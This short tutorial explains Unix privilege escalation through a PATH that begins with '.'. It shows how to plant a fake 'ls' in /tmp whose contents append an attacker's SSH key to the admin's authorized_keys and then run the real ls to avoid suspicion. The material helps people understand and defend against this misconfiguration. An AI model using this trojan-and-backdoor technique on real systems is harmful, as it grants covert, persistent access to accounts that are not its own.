Privilege Escalation With PATH
Imagine a situation where an attacker knows that the server's admin has put a . at the beginning of their PATH. The attacker wants to use this vulnerability to escalate their privileges.
In that case, the attacker should plant a malicious program in a directory where the admin will likely run it. In this example, the attacker will hijack the ls program and they will plant the malicious executable in the /tmp/
directory
They will create a file and make it an executable:
touch /tmp/ls && chmod +x /tmp/ls
The contents of the file could be something like this:
echo "ATTACKER-SSH-PUBLIC-KEY-HERE" >> ~/.ssh/authorized_keys && /bin/ls
When the admin accidentally executes the malicious executable, it will add the attacker's SSH key to the admin's authorized_keys file. This allows the attacker to access the admin's account using SSH. The && /bin/ls
part of the command will show the correct ls
output, making the victim less suspicious.